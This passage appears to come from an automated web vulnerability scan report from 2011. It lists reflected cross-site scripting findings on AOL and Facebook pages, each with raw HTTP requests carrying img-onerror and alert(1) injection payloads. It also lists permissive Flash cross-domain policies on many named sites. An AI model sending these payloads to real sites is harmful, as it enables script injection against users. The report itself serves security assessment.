Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; s_pers=%20s_getnr%3D1304574981881-Repeat%7C1367646981881%3B%20s_nrgvo%3DRepeat%7C1367646981882%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; rrpmo1=rr1~1~1304556981389~05d687"-alert(1)-"65e99ea59a8; stips5=1; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; dlact=dl2

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:56:45 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-149-174-24-45.asset.aol.com
Content-Type: text/html;;charset=utf-8
Set-Cookie: JSESSIONID=5BD36E2786B24B66765E62769A9E47BB; Path=/aol
Content-Length: 63383

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.fac
...[SNIP]...
<script type="text/javascript">
var origUrl="http%3A%2F%2Fwww.aol.com%2F";
var ae_url="https://www.aol.com/aimexpress.jsp";
cookies.set("rrpmo1","rr1~2~1304556981389~05d687"-alert(1)-"65e99ea59a8");</script>
...[SNIP]...

2.52. http://www.facebook.com/people/Alexander-Bucky-Jordan/1242845259 [REST URL parameter 3] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/people/Alexander-Bucky-Jordan/1242845259

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload e76bc<img%20src%3da%20onerror%3dalert(1)>b0233c9330b was submitted in the REST URL parameter 3. This input was echoed as e76bc<img src=a onerror=alert(1)>b0233c9330b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /people/Alexander-Bucky-Jordan/1242845259e76bc<img%20src%3da%20onerror%3dalert(1)>b0233c9330b HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 302 Found
Location: /1242845259e76bc<img src=a onerror=alert(1)>b0233c9330b
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.153.41
Connection: close
Date: Thu, 05 May 2011 11:43:12 GMT
Content-Length: 55

/1242845259e76bc<img src=a onerror=alert(1)>b0233c9330b

2.53. http://www.facebook.com/people/Bucky-Jordan%20/100000824820783 [REST URL parameter 3] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/people/Bucky-Jordan%20/100000824820783

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 1c030<img%20src%3da%20onerror%3dalert(1)>5ccc611056 was submitted in the REST URL parameter 3. This input was echoed as 1c030<img src=a onerror=alert(1)>5ccc611056 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /people/Bucky-Jordan%20/1000008248207831c030<img%20src%3da%20onerror%3dalert(1)>5ccc611056 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
X-Purpose: : preview
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; wd=907x1007

Response

HTTP/1.1 302 Found
Location: /1000008248207831c030<img src=a onerror=alert(1)>5ccc611056
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.195.33
X-Cnection: close
Date: Thu, 05 May 2011 11:44:01 GMT
Content-Length: 59

/1000008248207831c030<img src=a onerror=alert(1)>5ccc611056

2.54. http://www.facebook.com/people/Bucky-Jordan/100000824820783 [REST URL parameter 3] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/people/Bucky-Jordan/100000824820783

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 41583<img%20src%3da%20onerror%3dalert(1)>ab0e5e0e0bd was submitted in the REST URL parameter 3. This input was echoed as 41583<img src=a onerror=alert(1)>ab0e5e0e0bd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /people/Bucky-Jordan/10000082482078341583<img%20src%3da%20onerror%3dalert(1)>ab0e5e0e0bd HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: /10000082482078341583<img src=a onerror=alert(1)>ab0e5e0e0bd
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.236.106
X-Cnection: close
Date: Thu, 05 May 2011 02:52:12 GMT
Content-Length: 60

/10000082482078341583<img src=a onerror=alert(1)>ab0e5e0e0bd

2.55. http://www.facebook.com/people/Bucky-Jordan/100000824820783/x22 [REST URL parameter 4] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/people/Bucky-Jordan/100000824820783/x22

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a46e0<img%20src%3da%20onerror%3dalert(1)>3df2a38ae45 was submitted in the REST URL parameter 4. This input was echoed as a46e0<img src=a onerror=alert(1)>3df2a38ae45 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /people/Bucky-Jordan/100000824820783/x22a46e0<img%20src%3da%20onerror%3dalert(1)>3df2a38ae45 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 302 Found
Location: /x22a46e0<img src=a onerror=alert(1)>3df2a38ae45
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.147.43
Connection: close
Date: Thu, 05 May 2011 11:43:07 GMT
Content-Length: 48

/x22a46e0<img src=a onerror=alert(1)>3df2a38ae45

3. Flash cross-domain policy previous next
There are 26 instances of this issue:

http://www.aolcdn.com/crossdomain.xml
http://www.everydayhealth.com/crossdomain.xml
http://www.huffingtonpost.com/crossdomain.xml
http://www.mapquest.com/crossdomain.xml
http://xml.truveo.com/crossdomain.xml
http://www.aol.com/crossdomain.xml
http://www.aolnews.com/crossdomain.xml
http://www.apple.com/crossdomain.xml
http://www.blogsmithmedia.com/crossdomain.xml
http://www.citysbest.com/crossdomain.xml
http://www.dailyfinance.com/crossdomain.xml
http://www.dooce.com/crossdomain.xml
http://www.facebook.com/crossdomain.xml
https://www.facebook.com/crossdomain.xml
http://www.ft.com/crossdomain.xml
https://www.godaddy.com/crossdomain.xml
http://www.ibm.com/crossdomain.xml
http://www.marketwatch.com/crossdomain.xml
http://www.mmafighting.com/crossdomain.xml
http://www.moviefone.com/crossdomain.xml
http://www.netvibes.com/crossdomain.xml
http://www.pageflakes.com/crossdomain.xml
http://www.popeater.com/crossdomain.xml
http://www.realtytrac.com/crossdomain.xml
http://www.tuaw.com/crossdomain.xml
http://www.truveo.com/crossdomain.xml

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.

3.1. http://www.aolcdn.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.aolcdn.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.aolcdn.com

Response

HTTP/1.0 200 OK
Last-Modified: Fri, 13 Feb 2009 16:24:41 GMT
Mime-Version: 1.0
Server: AOLserver/4.0.10
Content-Type: text/xml
Date: Thu, 05 May 2011 00:58:56 GMT
Content-Length: 421
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSche
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

3.2. http://www.everydayhealth.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.everydayhealth.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.everydayhealth.com

Response

HTTP/1.1 200 OK
Content-Length: 369
Content-Type: text/xml
Last-Modified: Fri, 22 Apr 2011 15:55:46 GMT
Accept-Ranges: bytes
ETag: "02df0bd51cc1:3644"
Server: Microsoft-IIS/6.0
ServerID: : USNJWWEB11
X-Powered-By: ASP.NET
Date: Thu, 05 May 2011 10:56:31 GMT
Connection: close

...<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<site-control permi
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

3.3. http://www.huffingtonpost.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.huffingtonpost.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.huffingtonpost.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.8 (Unix)
Last-Modified: Thu, 01 Jul 2010 13:55:20 GMT
ETag: "13598ce-fd-48a53d22e2200"
Content-Type: application/xml
Date: Thu, 05 May 2011 00:58:42 GMT
Content-Length: 253
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy><allow-access-from domain="*" /><allow-http-request-headers
...[SNIP]...

3.4. http://www.mapquest.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.mapquest.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.mapquest.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: t_Id=ZGVmYXVsdDpudWxs; Path=/
Set-Cookie: tsession="nZG12c16OqjJIk32ss/xe+wwpew="; Version=1; Domain=mapquest.com; Max-Age=1800; Expires=Thu, 05-May-2011 01:27:04 GMT; Path=/
Set-Cookie: tsexpiry=1; Domain=mapquest.com; Expires=Thu, 05-May-2011 01:12:04 GMT; Path=/
Set-Cookie: psession="ul5Rtcgv+4mAPbUgz5v+xO8fVFE="; Version=1; Domain=mapquest.com; Max-Age=7776000; Expires=Wed, 03-Aug-2011 00:57:04 GMT; Path=/
Set-Cookie: c_Id=MjM5OjM5OQ%3D%3D; Expires=Thu, 05-May-2011 01:27:04 GMT; Path=/
Accept-Ranges: bytes
ETag: W/"209-1304454924000"
Last-Modified: Tue, 03 May 2011 20:35:24 GMT
Content-Type: application/xml
Content-Length: 209
Date: Thu, 05 May 2011 00:57:04 GMT
Connection: keep-alive

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*" secure="false"/></cross-domain
...[SNIP]...

3.5. http://xml.truveo.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://xml.truveo.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: xml.truveo.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:57:31 GMT
Server: Apache
Last-Modified: Tue, 03 May 2011 20:08:41 GMT
ETag: "1294019-104-4a264b4d30440"
Accept-Ranges: bytes
Content-Length: 260
Keep-Alive: timeout=15, max=65
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
<site-control perm
...[SNIP]...

3.6. http://www.aol.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.aol.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.aol.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:56:22 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 1066
Keep-Alive: timeout=5, max=85
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.aol.com" />
<allow-access-from domain="*.channels.aol.com" />
<allow-access-from domain="*.web.aol.com" />
<allow-access-from domain="*.my.aol.com" />
<allow-access-from domain="channelevents.estage.aol.com" />
<allow-access-from domain="channelevents.aol.com" />
<allow-access-from domain="*.office.aol.com" />
<allow-access-from domain="*.channel.aol.com" />
<allow-access-from domain="cdn-startpage.aol.com" />
<allow-access-from domain="startpage.aol.com" />
<allow-access-from domain="cdn.digitalcity.com" />
<allow-access-from domain="progressive.stream.aol.com" />
<allow-access-from domain="ad.doubleclick.net" />
<allow-access-from domain="*.aolcdn.com" />
<allow-access-from domain="*.unicast.com" />
...[SNIP]...

3.7. http://www.aolnews.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.aolnews.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.aolnews.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:56:19 GMT
Server: Apache/2.2
Accept-Ranges: bytes
Content-Length: 2128
Keep-Alive: timeout=5, max=999989
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.aol.com" />
<allow-access-from domain="*.aolcdn.com" />
<allow-access-from domain="*.channel.aol.com" />
<allow-access-from domain="*.channels.aol.com" />
<allow-access-from domain="*.digitalcity.com" />
<allow-access-from domain="*.digitas.com" />
<allow-access-from domain="*.facebook.com" />
<allow-access-from domain="*.my.aol.com" />
<allow-access-from domain="*.news.aol.com" />
<allow-access-from domain="*.office.aol.com" />
<allow-access-from domain="*.opticalcortex.com" />
<allow-access-from domain="*.pointroll.com" />
<allow-access-from domain="*.pointroll.net" />
<allow-access-from domain="*.popeater.com" />
<allow-access-from domain="*.publishing.aol.com" />

<allow-access-from domain="*.rewind.com" />
<allow-access-from domain="*.spinner.com" />
<allow-access-from domain="*.stats.com" />
<allow-access-from domain="*.theboombox.com" />
<allow-access-from domain="*.tmz.com" />
<allow-access-from domain="*.unicast.com" />
<allow-access-from domain="*.video.aol.com" />
<allow-access-from domain="*.video.office.aol.com" />
<allow-access-from domain="*.web.aol.com" />
<allow-access-from domain="*.yourminis.com" />
<allow-access-from domain="aimcreate.mdat.aim.com:30100 " />
<allow-access-from domain="cdn-startpage.aol.com" />
<allow-access-from domain="cdn.digitalcity.com" />
<allow-access-from domain="channelevents.aol.com" />
<allow-access-from domain="channelevents.estage.aol.com" />
<allow-access-from domain="goldrush.aol.com" to-ports="80" />
...[SNIP]...
<allow-access-from domain="iamalpha.com" />

<allow-access-from domain="imakealpha.com" />
<allow-access-from domain="progressive.stream.aol.com" />
<allow-access-from domain="publishing.aol.com" />
<allow-access-from domain="stage.goldrush.aol.com" to-ports="80" />
...[SNIP]...
<allow-access-from domain="startpage.aol.com" />
<allow-access-from domain="static.stats.com" />
<allow-access-from domain="tmz.warnerbros.com" />
...[SNIP]...

3.8. http://www.apple.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.apple.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.apple.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 02 Jun 2005 16:16:28 GMT
ETag: "8d-3f8918f48ef00"
Server: Apache/2.2.3 (Oracle)
X-N: S
X-Cached-Time: Mon, 21 Mar 2011 16:49:30 GMT
nnCoection: close
Content-Type: application/xml
Content-Length: 141
Cache-Control: max-age=28
Expires: Thu, 05 May 2011 12:45:46 GMT
Date: Thu, 05 May 2011 12:45:18 GMT
Connection: close

<cross-domain-policy>
<allow-access-from domain="wdirect.apple.com" />
<allow-access-from domain="*.apple.com" />
</cross-domain-policy>

3.9. http://www.blogsmithmedia.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.blogsmithmedia.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.blogsmithmedia.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Thu, 23 Dec 2010 02:59:47 GMT
Content-Type: application/xml
Cache-Control: max-age=3600
Expires: Thu, 05 May 2011 01:58:26 GMT
Date: Thu, 05 May 2011 00:58:26 GMT
Content-Length: 782
Connection: close
X-N: S

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-in
...[SNIP]...
<allow-access-from domain="*.blogsmith.net" to-ports="*" />
   <allow-access-from domain="*.blogsmith.com" to-ports="*" />
   <allow-access-from domain="*.aolcdn.com" to-ports="*" />
   <allow-access-from domain="*.aol.com" to-ports="*" />
   <allow-access-from domain="*.*.aol.com" to-ports="*" />
   <allow-access-from domain="*.yourminis.com" to-ports="*" />
...[SNIP]...

3.10. http://www.citysbest.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.citysbest.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.citysbest.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:58:38 GMT
Server: Apache/2.2
Accept-Ranges: bytes
Content-Length: 269
Keep-Alive: timeout=5, max=999877
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.aol.com" />
<allow-access-from domain="*.blogsmithmedia.com" />
...[SNIP]...

3.11. http://www.dailyfinance.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.dailyfinance.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.dailyfinance.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:58:36 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Content-Length: 204
Keep-Alive: timeout=5, max=999968
Connection: Keep-Alive
Content-Type: text/xml; charset=utf-8

<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"/>
<allow-access-from domain="*.aolcdn.com"/>
<allow-access-from domain="*.test.aol.com"/>
</cross-domain-pol
...[SNIP]...

3.12. http://www.dooce.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.dooce.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.dooce.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:56:30 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.11
Last-Modified: Wed, 01 Sep 2010 16:56:47 GMT
ETag: "67b2ba4-120-48f359541d1c0"
Accept-Ranges: bytes
Content-Length: 288
Cache-Control: max-age=1209600
Expires: Thu, 19 May 2011 10:56:30 GMT
Connection: close
Content-Type: application/xml

<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<allow-access-from domain="*.brightcove.com"/>
<allow-access-from domain="*.google-analytics.com"/>
...[SNIP]...

3.13. http://www.facebook.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.42.76.43
Connection: close
Content-Length: 1473

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
...[SNIP]...
<allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
   <allow-access-from domain="static.ak.fbcdn.net" />
   <allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
...[SNIP]...

3.14. https://www.facebook.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.facebook.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.136.90.127
Connection: close
Content-Length: 1473

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
...[SNIP]...
<allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
   <allow-access-from domain="static.ak.fbcdn.net" />
   <allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
